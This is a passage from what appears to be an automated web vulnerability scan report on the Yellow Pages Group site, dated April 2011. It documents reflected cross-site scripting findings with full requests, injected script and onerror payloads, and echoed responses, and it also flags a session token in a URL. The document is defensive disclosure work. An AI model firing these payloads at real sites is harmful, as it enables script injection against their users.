Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</ea846;alert(1)//f47b0af8e66"
[3]=>
...[SNIP]...

1.12. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7a283<script>alert(1)</script>472a5342049 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E7a283<script>alert(1)</script>472a5342049 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>7a283<script>alert(1)</script>472a5342049"
[3]=>
...[SNIP]...

1.13. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d9793<script>alert(1)</script>c26675cd183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E?d9793<script>alert(1)</script>c26675cd183=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["d9793<script>alert(1)</script>c26675cd183"]=>
...[SNIP]...

1.14. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df was submitted in the REST URL parameter 1. This input was echoed as 96651--><img src=a onerror=alert(1)>14a5bb298df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df/images/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en96651--><img src=a onerror=alert(1)>14a5bb298df)
        </p>
...[SNIP]...

1.15. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ceec2--><script>alert(1)</script>f06c185198a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif"
[3]=>
...[SNIP]...

1.16. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4cdfc--><script>alert(1)</script>6c7aea9cdab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/images/loading.gif4cdfc--><script>alert(1)</script>6c7aea9cdab"
[3]=>
...[SNIP]...

1.17. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 89ae2--><script>alert(1)</script>0468e44a0a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/images/loading.gif?89ae2--><script>alert(1)</script>0468e44a0a9=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:23:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
rl"]=>
string(19) "/images/loading.gif"
[3]=>
string(18) "images/loading.gif"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["89ae2--><script>alert(1)</script>0468e44a0a9"]=>
...[SNIP]...

1.18. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload eef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb was submitted in the REST URL parameter 1. This input was echoed as eef14--><img src=a onerror=alert(1)>926bd771afb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /imageseef14--><img%20src%3da%20onerror%3dalert(1)>926bd771afb/imageresizer.php?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (imageseef14--><img src=a onerror=alert(1)>926bd771afb)
        </p>
...[SNIP]...

1.19. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed was submitted in the REST URL parameter 2. This input was echoed as 6af35--><img src=a onerror=alert(1)>3e1a5ad96ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/imageresizer.php6af35--><img%20src%3da%20onerror%3dalert(1)>3e1a5ad96ed?src=_var_data_gallery_photo_71_14_95_98_12_108.png&w=326&h=50&o=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(7) {
["controller"]=>
string(6) "images"
["action"]=>
string(63) "imageresizer.php6af35--><img src=a onerror=alert(1)>3e1a5ad96ed"
["module"]=>
...[SNIP]...

1.20. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee was submitted in the REST URL parameter 1. This input was echoed as d418d--><img src=a onerror=alert(1)>ffc954ffcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modulesd418d--><img%20src%3da%20onerror%3dalert(1)>ffc954ffcee/core/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:23:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (modulesd418d--><img src=a onerror=alert(1)>ffc954ffcee)
        </p>
...[SNIP]...

1.21. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964 was submitted in the REST URL parameter 2. This input was echoed as f13c6--><img src=a onerror=alert(1)>68e93f27964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/coref13c6--><img%20src%3da%20onerror%3dalert(1)>68e93f27964/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:24:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(51) "coref13c6--><img src=a onerror=alert(1)>68e93f27964"
["front"]=>
...[SNIP]...

1.22. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147 was submitted in the REST URL parameter 3. This input was echoed as 42cf2--><img src=a onerror=alert(1)>4fde6733147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front42cf2--><img%20src%3da%20onerror%3dalert(1)>4fde6733147/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:26:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front42cf2--><img src=a onerror=alert(1)>4fde6733147"]=>
...[SNIP]...

1.23. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload aeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a was submitted in the REST URL parameter 4. This input was echoed as aeff6--><img src=a onerror=alert(1)>052b8df489a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /modules/core/front/imagesaeff6--><img%20src%3da%20onerror%3dalert(1)>052b8df489a/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(4) {
["controller"]=>
string(7) "modules"
["action"]=>
string(4) "core"
["front"]=>
string(53) "imagesaeff6--><img src=a onerror=alert(1)>052b8df489a"
["module"]=>
...[SNIP]...

2. Session token in URL  previous  next
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://www.ypg.com/en/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /en/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/ HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:21:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=ljn6ngfllljc19g9hp7vtra985; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/media.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Advertise on LesPAC.com">Advertise on LesPAC.com</a>
...[SNIP]...
